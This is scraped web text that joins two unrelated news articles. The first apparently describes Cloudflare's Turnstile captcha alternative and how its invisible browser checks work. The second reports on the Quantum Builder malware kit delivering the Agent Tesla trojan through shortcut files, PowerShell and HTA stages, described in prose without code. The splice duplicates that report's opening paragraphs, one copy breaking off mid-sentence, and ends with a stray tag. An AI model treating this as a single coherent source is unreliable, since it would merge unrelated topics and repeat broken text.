The internet infrastructure company has an alternative tool to check whether you’re human—and it doesn’t force you to pick out buses in tiny boxes.

There's a uniquely bitter rage that comes from being asked to click every box that contains a parking meter only to then be told that you missed one because of a tiny sliver of gray that barely floated into the periphery of an otherwise empty, adjacent square. It's a familiar fury, and one that captchas have been provoking across the web for years, but these maddening tools are important for blocking bots from conducting fraud and other abuse. Google's reCaptcha, the dominant tool around the world for implementing these checks, came out with a version in 2018 that uses machine learning to silently check humanness behind the scenes and phase out the garbled, blurry strings of letters and grids full of traffic lights. This week, the internet infrastructure company Cloudflare is releasing a competitor.

Like reCaptcha, Cloudflare's new alternative, dubbed Turnstile, is free, and you don't have to be a Cloudflare customer to put it on your site. Turnstile is based on a tool called Cloudflare Managed Challenge that the company released for its own services in April. When you do a captcha, you are completing a “challenge” of your humanness. Managed Challenge, on the other hand, runs quick and silent checks of your browser's technical behavior and other telemetry in an attempt to determine that you are human without asking you to do anything. Only when the tool lacks adequate confidence will it show you a “harder challenge” or a puzzle to solve. And Managed Challenge, which is an enterprise product for Cloudflare customers, is constantly testing different types of puzzles to find the options that are less frustrating for users. 

Anyone can now implement Turnstile for free through an application programming interface. You can set it up to only run invisible challenges that don't appear to the user at all or elect to have the system show a button for users to click as an additional humanness check. Unlike Managed Challenge, Turnstile never shows harder challenges or Captchas.

“If a person were walking down the street next to a robot, even without asking the person or robot any questions, you’d be able to observe differences between them just by watching them walk past,” says Cloudflare's chief technology officer, John Graham-Cumming. “Turnstile can do that for the signals your computer sends to the website you’re accessing, which include what web browser you are using or what device this is coming from. In the case of a machine trying to impersonate a human user, they often don’t get all these details right—there’s usually something ‘off’ about the request.”

Invisible challenges include tests like complex equations that devices are asked to solve. Turnstile has data about how long it takes different devices—say, a Macbook Air or a Samsung Galaxy—to solve the challenge. If a device claims to be a Samsung Galaxy S22, but solves the challenge much more quickly than that device should be able to, it may indicate that the request is really coming from an automated system run out of a data center. 

Courtesy of Cloudfare

Captchas are an important security defense across the web, but Cloudflare is billing Turnstile as particularly privacy-protective as well. The tool will look at some browser session data, like browser characteristics and data from website rendering mechanisms, but the service doesn't check advertising cookies or login cookies. And the company plans to outsource as much data review as possible to minimize how much Cloudflare ever sees. For example, Turnstile will check for Apple's "Private Access Tokens," launched this year as a tool for attesting that a user is human and reducing the need for captchas. 

Researchers have found in recent years that Google's reCaptcha checks to see whether a user has a Google login cookie as one of the factors in determining whether they are human. Google denies that reCaptcha data is used for anything other than challenges, but some have pointed out that the data could be used in targeted advertising campaigns.

Cloudflare says that since launching Managed Challenge, it has dramatically reduced the number of captchas it serves.

“Before we introduced Cloudflare Managed Challenge, if we believed a visitor was a bot but our customer wanted us to confirm that, then we would serve a Captcha 100 percent of the time,” Graham-Cumming says. “After introducing Cloudflare Managed Challenge, that number was reduced down to 9 percent. Today, that number is further reduced down to 3 percent.”

The company adds that users previously spent an average of 32 seconds doing captchas on its own sites. Since implementing Managed Challenge, the average wait time is one second because of the new feature's silent, behind-the-scenes challenges. In the Cloudflare dashboard, the captcha option is now called “Legacy Captcha." The company says that, “this more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use."

Turnstile is part of a broader industry effort to rework captchas and make them less frustrating for users. But reCaptcha's ubiquity and familiarity may hinder adoption of new alternatives. As the field shifts, though, it may be ripe for a new player—especially one that doesn't make you want to chuck your laptop into the sea.

_Updated 9-28-2022, 6:20 pm ET: Included additional details about Turnstile and comment from Cloudflare. We also clarified the types of “challenges” Turnstile will present users._

Cloudflare Takes a Stab at a Captcha That Doesn’t Suck

A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT).
"This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up.

Sold on the dark web for €

A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT).

"This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up.

Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case Agent Tesla.

The multi-stage attack chain starts with a spear-phishing containing a GZIP archive attachment that includes a shortcut designed to execute PowerShell code responsible for launching a remote HTML application (HTA) using MSHTA.

The phishing emails purport to be an order confirmation message from a Chinese supplier of lump and rock sugar, with the LNK file masquerading as a PDF document.

The HTA file, in turn, decrypts and executes another PowerShell loader script, which acts as a downloader for fetching the Agent Tesla malware and executing it with administrative privileges.

In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting further obfuscation strategies to camouflage the malicious activity.

Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.

"Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace," the researchers said.

"This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac